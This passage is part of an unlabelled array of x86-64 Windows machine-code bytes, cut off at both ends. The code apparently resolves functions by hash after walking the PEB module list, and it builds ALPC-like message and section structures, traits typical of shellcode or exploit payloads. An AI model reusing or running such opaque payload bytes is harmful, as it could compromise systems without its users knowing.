00,0x48,0xC7,0x45,0xE8,0x78,0x05,0x00,0x00,0x48,0x8B,0x45,0x78,0x48,0x8B,0x8D,0xB0,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x38,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xE8,0x48,0x89,0x54,0x24,0x28,0x48,0x8B,0x95,0xB8,0x00,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xC8,0xBA,0x00,0x00,0x02,0x00,0x48,0x89,0xC1,0xE8,0x2A,0x6F,0x00,0x00,0x89,0x85,0x98,0x00,0x00,0x00,0x83,0xBD,0x98,0x00,0x00,0x00,0x00,0x78,0x38,0x83,0xBD,0x98,0x00,0x00,0x00,0x00,0x78,0x32,0x81,0xBD,0x98,0x00,0x00,0x00,0x02,0x01,0x00,0x00,0x74,0x26,0x48,0x8B,0x85,0xB8,0x00,0x00,0x00,0x8B,0x40,0x2C,0x85,0xC0,0x78,0x1B,0xC7,0x85,0x9C,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0x78,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0x78,0x48,0x89,0xC1,0xE8,0xBE,0x62,0x00,0x00,0x8B,0x85,0x9C,0x00,0x00,0x00,0x48,0x81,0xC4,0x20,0x01,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0xC0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x18,0xC7,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0x10,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x00,0x04,0x00,0x00,0x89,0xC1,0xE8,0xA7,0x35,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x5B,0x48,0x8B,0x55,0xE8,0x48,0x8B,0x45,0xF0,0x48,0x8D,0x4D,0xE8,0x48,0x89,0x4C,0x24,0x28,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x08,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF7,0x71,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x28,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0xE8,0xFC,0x1E,0x00,0x00,0x48,0x8B,0x55,0x18,0x89,0x02,0x48,0x8B,0x45,0x18,0x8B,0x00,0x85,0xC0,0x74,0x0F,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x0C,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xDD,0x61,0x00,0x00,0x48,0x8B,0x45,0xE8,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0xE8,0xC8,0x61,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0xF8,0x0C,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x89,0x8D,0x90,0x0C,0x00,0x00,0x48,0x89,0x95,0x98,0x0C,0x00,0x00,0xC7,0x85,0x6C,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x5C,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x58,0x0C,0x00,0x00,0x01,0x00,0x00,0xC0,0xC7,0x85,0x4C,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x40,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x50,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x38,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x30,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x28,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x20,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x18,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x10,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0xE0,0x0B,0x00,0x00,0x0F,0x11,0x85,0xF0,0x0B,0x00,0x00,0x0F,0x11,0x85,0x00,0x0C,0x00,0x00,0x48,0xC7,0x85,0xD0,0x0B,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xD8,0x0B,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xC8,0x0B,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x60,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x95,0x30,0x0B,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xB9,0x13,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x85,0x20,0x0B,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x28,0x0B,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x95,0x50,0x06,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xB9,0x9A,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0xC7,0x85,0x30,0x0B,0x00,0x00,0x01,0x00,0x00,0xC0,0x48,0x8D,0x85,0x30,0x0B,0x00,0x00,0x48,0x89,0x85,0x20,0x0B,0x00,0x00,0x48,0x8D,0x85,0x50,0x06,0x00,0x00,0x48,0x89,0x85,0x28,0x0B,0x00,0x00,0x48,0x8D,0x85,0xC8,0x0B,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB6,0xF7,0xFF,0xFF,0x89,0x85,0x5C,0x0C,0x00,0x00,0x83,0xBD,0x5C,0x0C,0x00,0x00,0x00,0x0F,0x84,0x67,0x04,0x00,0x00,0xC7,0x85,0xE0,0x0B,0x00,0x00,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0xE8,0x0B,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0xF8,0x0B,0x00,0x00,0x02,0x00,0x00,0x00,0x48,0xC7,0x85,0xF0,0x0B,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x00,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x08,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x95,0xE0,0x0B,0x00,0x00,0x48,0x8D,0x85,0x38,0x0C,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x10,0x48,0x89,0xC1,0xE8,0x4C,0x6D,0x00,0x00,0x89,0x85,0x58,0x0C,0x00,0x00,0x83,0xBD,0x58,0x0C,0x00,0x00,0x00,0x0F,0x88,0xEB,0x03,0x00,0x00,0x48,0x8D,0x95,0xE0,0x0B,0x00,0x00,0x48,0x8D,0x85,0x30,0x0C,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x10,0x48,0x89,0xC1,0xE8,0x0D,0x6D,0x00,0x00,0x89,0x85,0x58,0x0C,0x00,0x00,0x83,0xBD,0x58,0x0C,0x00,0x00,0x00,0x0F,0x88,0xAF,0x03,0x00,0x00,0x48,0xC7,0x85,0x18,0x0C,0x00,0x00,0xF8,0x00,0x00,0x00,0x48,0x8D,0x8D,0x18,0x0C,0x00,0x00,0x48,0x8D,0x95,0xE0,0x0B,0x00,0x00,0x48,0x8D,0x85,0x28,0x0C,0x00,0x00,0x48,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x08,0xC7,0x44,0x24,0x20,0x04,0x00,0x00,0x00,0x49,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x1F,0x00,0x0F,0x00,0x48,0x89,0xC1,0xE8,0x86,0x67,0x00,0x00,0x89,0x85,0x58,0x0C,0x00,0x00,0x83,0xBD,0x58,0x0C,0x00,0x00,0x00,0x0F,0x88,0x53,0x03,0x00,0x00,0x48,0x8B,0x85,0x28,0x0C,0x00,0x00,0x48,0x8D,0x8D,0x20,0x0C,0x00,0x00,0xC7,0x44,0x24,0x48,0x04,0x00,0x00,0x00,0xC7,0x44,0x24,0x40,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x01,0x00,0x00,0x00,0x48,0x8D,0x95,0x10,0x0C,0x00,0x00,0x48,0x89,0x54,0x24,0x30,0x48,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0xC7,0xC2,0xFF,0xFF,0xFF,0xFF,0x48,0x89,0xC1,0xE8,0xAE,0x6F,0x00,0x00,0x89,0x85,0x58,0x0C,0x00,0x00,0x83,0xBD,0x58,0x0C,0x00,0x00,0x00,0x0F,0x88,0xE7,0x02,0x00,0x00,0x48,0x8D,0x95,0x4C,0x0C,0x00,0x00,0x8B,0x85,0x90,0x0C,0x00,0x00,0x89,0xC1,0xE8,0x01,0xFC,0xFF,0xFF,0x89,0x85,0x5C,0x0C,0x00,0x00,0x83,0xBD,0x5C,0x0C,0x00,0x00,0x00,0x0F,0x84,0xC3,0x02,0x00,0x00,0x8B,0x85,0x90,0x0C,0x00,0x00,0x48,0x89,0x85,0xD0,0x0B,0x00,0x00,0x8B,0x85,0x4C,0x0C,0x00,0x00,0x89,0xC0,0x48,0x89,0x85,0xD8,0x0B,0x00,0x00,0x48,0x8D,0x8D,0xD0,0x0B,0x00,0x00,0x48,0x8D,0x95,0xE0,0x0B,0x00,0x00,0x48,0x8D,0x85,0x40,0x0C,0x00,0x00,0x49,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x00,0x08,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD9,0x6E,0x00,0x00,0x89,0x85,0x58,0x0C,0x00,0x00,0x83,0xBD,0x58,0x0C,0x00,0x00,0x00,0x0F,0x88,0x6F,0x02,0x00,0x00,0x48,0x8D,0x95,0x50,0x05,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xB9,0x1F,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0xC7,0x85,0x50,0x05,0x00,0x00,0xF8,0x00,0x00,0x00,0x48,0x8D,0x85,0x20,0x0B,0x00,0x00,0x48,0x89,0x85,0xF8,0x05,0x00,0x00,0x48,0x8B,0x85,0x30,0x0C,0x00,0x00,0x48,0x89,0x85,0x20,0x06,0x00,0x00,0x48,0x8B,0x85,0x38,0x0C,0x00,0x00,0x48,0x89,0x85,0x18,0x06,0x00,0x00,0xC7,0x85,0x00,0x06,0x00,0x00,0x05,0x40,0x00,0x80,0xC7,0x85,0x38,0x06,0x00,0x00,0x01,0x00,0x00,0xC0,0xE8,0x27,0x09,0x00,0x00,0x89,0x85,0x40,0x06,0x00,0x00,0x8B,0x85,0x90,0x0C,0x00,0x00,0x89,0x85,0x54,0x05,0x00,0x00,0x48,0x8B,0x85,0x98,0x0C,0x00,0x00,0x48,0x89,0x85,0x08,0x06,0x00,0x00,0x8B,0x85,0x4C,0x0C,0x00,0x00,0x89,0x85,0x58,0x05,0x00,0x00,0x48,0x8B,0x85,0x40,0x0C,0x00,0x00,0x48,0x89,0x85,0x10,0x06,0x00,0x00,0x48,0x8D,0x55,0xD0,0xB8,0x00,0x00,0x00,0x00,0xB9,0xAF,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x66,0xC7,0x45,0xD2,0x78,0x05,0x66,0xC7,0x45,0xD0,0x50,0x05,0xC7,0x45,0xF8,0x00,0x00,0x00,0x20,0xC7,0x45,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x28,0x0C,0x00,0x00,0x48,0x89,0x45,0x08,0x48,0x8B,0x85,0x30,0x0C,0x00,0x00,0x48,0x89,0x45,0x18,0x48,0x8B,0x85,0x38,0x0C,0x00,0x00,0x48,0x89,0x45,0x10,0x48,0x8B,0x85,0x28,0x0C,0x00,0x00,0x48,0x89,0x45,0x20,0x48,0x8B,0x85,0x08,0x06,0x00,0x00,0x48,0x89,0x45,0x28,0x48,0x8B,0x85,0x10,0x06,0x00,0x00,0x48,0x89,0x45,0x30,0x8B,0x85,0x54,0x05,0x00,0x00,0x89,0x45,0x04,0x48,0x8B,0x05,0x4A,0x3E,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x78,0x05,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x3B,0x3E,0x01,0x00,0xFF,0xD0,0x48,0x89,0x85,0x60,0x0C,0x00,0x00,0x48,0x83,0xBD,0x60,0x0C,0x00,0x00,0x00,0x0F,0x84,0x26,0x01,0x00,0x00,0x48,0x8B,0x85,0x60,0x0C,0x00,0x00,0x66,0xC7,0x40,0x02,0x78,0x05,0x48,0x8B,0x85,0x60,0x0C,0x00,0x00,0x66,0xC7,0x00,0x50,0x05,0x48,0x8B,0x85,0x20,0x0C,0x00,0x00,0x48,0x8D,0x95,0x50,0x05,0x00,0x00,0x41,0xB8,0xF8,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x67,0xAC,0x00,0x00,0x48,0x8B,0x95,0x60,0x0C,0x00,0x00,0x48,0x8D,0x45,0xD0,0x48,0x89,0xC1,0xE8,0xB1,0xF7,0xFF,0xFF,0x89,0x85,0x5C,0x0C,0x00,0x00,0x83,0xBD,0x5C,0x0C,0x00,0x00,0x00,0x0F,0x84,0xCE,0x00,0x00,0x00,0x48,0x8B,0x85,0x60,0x0C,0x00,0x00,0x8B,0x40,0x2C,0x85,0xC0,0x0F,0x88,0xBF,0x00,0x00,0x00,0x48,0x8B,0x85,0x60,0x0C,0x00,0x00,0x8B,0x40,0x28,0x3D,0x02,0x00,0x00,0x20,0x0F,0x85,0xAD,0x00,0x00,0x00,0x48,0x8B,0x85,0x60,0x0C,0x00,0x00,0x8B,0x40,0x30,0x89,0xC0,0x48,0x89,0x85,0x50,0x0C,0x00,0x00,0x48,0x83,0xBD,0x50,0x0C,0x00,0x00,0x00,0x0F,0x84,0x8F,0x00,0x00,0x00,0x48,0x8B,0x85,0x50,0x0C,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB4,0x60,0x00,0x00,0x89,0x85,0x58,0x0C,0x00,0x00,0x81,0xBD,0x58,0x0C,0x00,0x00,0x02,0x01,0x00,0x00,0x74,0x2B,0x83,0xBD,0x58,0x0C,0x00,0x00,0x00,0x78,0x22,0x81,0xBD,0x58,0x0C,0x00,0x00,0xC0,0x00,0x00,0x00,0x74,0xBF,0x81,0xBD,0x58,0x0C,0x00,0x00,0x01,0x01,0x00,0x00,0x74,0xB3,0xC7,0x85,0x58,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0xE8,0xD7,0x05,0x00,0x00,0x89,0x85,0x5C,0x0C,0x00,0x00,0xC7,0x85,0x6C,0x0C,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x22,0x90,0xEB,0x1F,0x90,0xEB,0x1C,0x90,0xEB,0x19,0x90,0xEB,0x16,0x90,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x85,0x40,0x0C,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0x40,0x0C,0x00,0x00,0x48,0x89,0xC1,0xE8,0xAC,0x5B,0x00,0x00,0x48,0x8B,0x85,0x20,0x0C,0x00,0x00,0x48,0x85,0xC0,0x74,0x1C,0x48,0x8B,0x85,0x20,0x0C,0x00,0x00,0x48,0x89,0xC2,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0xB8,0x6C,0x00,0x00,0x89,0x85,0x58,0x0C,0x00,0x00,0x48,0x8B,0x85,0x28,0x0C,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0x28,0x0C,0x00,0x00,0x48,0x89,0xC1,0xE8,0x69,0x5B,0x00,0x00,0x48,0x8B,0x85,0x30,0x0C,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0x30,0x0C,0x00,0x00,0x48,0x89,0xC1,0xE8,0x4E,0x5B,0x00,0x00,0x48,0x8B,0x85,0x38,0x0C,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0x38,0x0C,0x00,0x00,0x48,0x89,0xC1,0xE8,0x33,0x5B,0x00,0x00,0x48,0x8B,0x85,0xC8,0x0B,0x00,0x00,0x48,0x85,0xC0,0x74,0x1E,0x48,0x8B,0x85,0xC8,0x0B,0x00,0x00,0x48,0x89,0xC1,0xE8,0x22,0xF2,0xFF,0xFF,0x48,0x8B,0x85,0xC8,0x0B,0x00,0x00,0x48,0x89,0xC1,0xE8,0x09,0x5B,0x00,0x00,0x48,0x83,0xBD,0x60,0x0C,0x00,0x00,0x00,0x74,0x53,0x48,0x83,0xBD,0x60,0x0C,0x00,0x00,0x00,0x74,0x49,0x48,0x8B,0x85,0x60,0x0C,0x00,0x00,0x41,0xB8,0x78,0x05,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x85,0xAA,0x00,0x00,0x48,0x8B,0x05,0xF6,0x3B,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x95,0x60,0x0C,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xEB,0x3B,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x85,0x60,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x85,0x6C,0x0C,0x00,0x00,0x48,0x81,0xC4,0xF8,0x0C,0x00,0x00,0x5F,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x48,0x89,0x4D,0x10,0xE8,0x72,0x59,0x00,0x00,0x48,0x89,0x45,0xF0,0xC7,0x45,0xD4,0x60,0x00,0x00,0x00,0x8B,0x45,0xD4,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xC8,0x48,0x8B,0x45,0xC8,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x18,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x83,0xC0,0x10,0x48,0x89,0x45,0xD8,0x48,0x8B,0x45,0xE0,0x48,0x8B,0x40,0x10,0x48,0x89,0x45,0xF8,0xEB,0x59,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x39,0xD0,0x72,0x36,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x40,0x89,0xC0,0x48,0x01,0xD0,0x48,0x8B,0x55,0xF0,0x48,0x39,0xC2,0x73,0x19,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x60,0x48,0x8B,0x45,0x10,0x48,0x89,0x10,0xB8,0x01,0x00,0x00,0x00,0xEB,0x1E,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x3B,0x45,0xD8,0x75,0x9D,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xE0,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xA0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0x70,0xFF,0xFF,0xFF,0x0F,0x11,0x45,0x80,0x0F,0x11,0x45,0x90,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0x40,0xFF,0xFF,0xFF,0x0F,0x11,0x85,0x50,0xFF,0xFF,0xFF,0x66,0x0F,0xD6,0x85,0x60,0xFF,0xFF,0xFF,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xF3,0xCA,0x00,0x00,0x48,0x89,0xC1,0xE8,0x20,0x1E,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x20,0x0E,0xAE,0x06,0x48,0x89,0xC1,0xE8,0x2E,0x1C,0x00,0x00,0x48,0x89,0x45,0xE0,0x48,0x83,0x7D,0xE0,0x00,0x0F,0x84,0x48,0x02,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xBD,0xCA,0x00,0x00,0x48,0x89,0xC1,0xE8,0xEA,0x1D,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x1D,0x21,0x88,0x03,0x48,0x89,0xC1,0xE8,0xF8,0x1B,0x00,0x00,0x48,0x89,0x45,0xD8,0x48,0x83,0x7D,0xD8,0x00,0x0F,0x84,0x15,0x02,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x87,0xCA,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB4,0x1D,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x56,0x43,0xDD,0x7B,0x48,0x89,0xC1,0xE8,0xC2,0x1B,0x00,0x00,0x48,0x89,0x45,0xD0,0x48,0x83,0x7D,0xD0,0x00,0x0F,0x84,0xE2,0x01,0x00,0x00,0x48,0x8D,0x45,0xC0,0x48,0x89,0xC1,0xE8,0x21,0xFE,0xFF,0xFF,0x89,0x45,0xCC,0x83,0x7D,0xCC,0x00,0x0F,0x84,0xCC,0x01,0x00,0x00,0x48,0x8B,0x05,0xC5,0x39,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x0A,0x02,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xB6,0x39,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xA0,0x01,0x00,0x00,0x48,0x8B,0x45,0xF0,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x8D,0x15,0x1E,0xCA,0x00,0x00,0x48,0x89,0xC1,0xE8,0x74,0xA8,0x00,0x00,0x48,0x8B,0x55,0xC0,0x48,0x8B,0x45,0xF0,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x56,0xA8,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x89,0x45,0xA8,0x48,0x8B,0x45,0xA8,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x9D,0xA5,0x00,0x00,0x66,0x89,0x45,0xA0,0x0F,0xB7,0x45,0xA0,0x01,0xC0,0x66,0x89,0x45,0xA0,0x0F,0xB7,0x45,0xA0,0x83,0xC0,0x02,0x66,0x89,0x45,0xA2,0xC7,0x85,0x70,0xFF,0xFF,0xFF,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0x78,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x45,0x88,0x40,0x00,0x00,0x00,0x48,0x8D,0x45,0xA0,0x48,0x89,0x45,0x80,0x48,0xC7,0x45,0x90,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x98,0x00,0x00,0x00,0x00,0x48,0x8D,0x95,0x70,0xFF,0xFF,0xFF,0x48,0x8D,0x45,0xB8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x04,0x00,0x48,0x89,0xC1,0xE8,0x57,0x5F,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x88,0xE6,0x00,0x00,0x00,0x48,0x8D,0x85,0x40,0xFF,0xFF,0xFF,0x4C,0x8B,0x45,0xD8,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0x41,0xFF,0xD0,0x89,0x45,0xCC,0x83,0x7D,0xCC,0x00,0x0F,0x84,0xC6,0x00,0x00,0x00,0x48,0x8D,0x85,0x40,0xFF,0xFF,0xFF,0x4C,0x8B,0x55,0xD0,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0x41,0xFF,0xD2,0x89,0x45,0xCC,0x83,0x7D,0xCC,0x00,0x0F,0x84,0x9A,0x00,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x8D,0x95,0x40,0xFF,0xFF,0xFF,0x4C,0x8B,0x4D,0xE0,0x49,0x89,0xD0,0xBA,0x04,0x00,0x00,0x00,0x48,0x89,0xC1,0x41,0xFF,0xD1,0x89,0x45,0xCC,0x83,0x7D,0xCC,0x00,0x74,0x77,0x48,0x8B,0x45,0xB8,0x48,0x89,0xC1,0xE8,0x3A,0x57,0x00,0x00,0x89,0x45,0xEC,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x83,0x7D,0xEC,0x00,0x78,0x5D,0x48,0x8D,0x95,0x70,0xFF,0xFF,0xFF,0x48,0x8D,0x45,0xB8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x01,0x00,0x48,0x89,0xC1,0xE8,0x9A,0x5E,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x78,0x3C,0x48,0x8B,0x45,0xB8,0x48,0x89,0xC1,0xE8,0x98,0x60,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x78,0x2A,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x22,0x90,0xEB,0x1F,0x90,0xEB,0x1C,0x90,0xEB,0x19,0x90,0xEB,0x16,0x90,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xB8,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xB8,0x48,0x89,0xC1,0xE8,0xB0,0x56,0x00,0x00,0x48,0x83,0x7D,0xF0,0x00,0x74,0x54,0x48,0x83,0x7D,0xF0,0x00,0x74,0x4D,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x98,0xA6,0x00,0x00,0x48,0x8D,0x14,0x00,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x28,0xA6,0x00,0x00,0x48,0x8B,0x05,0x99,0x37,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x91,0x37,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x81,0xC4,0xE0,0x00,0x00,0x00,0x5D,0xC3,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x48,0x89,0x4D,0x10,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0x48,0x8B,0x05,0xCE,0x37,0x01,0x00,0xFF,0xD0,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x48,0x48,0x8D,0x6C,0x24,0x40,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x2C,0x01,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8B,0x5D,0xF8,0x48,0x8B,0x05,0x14,0x37,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x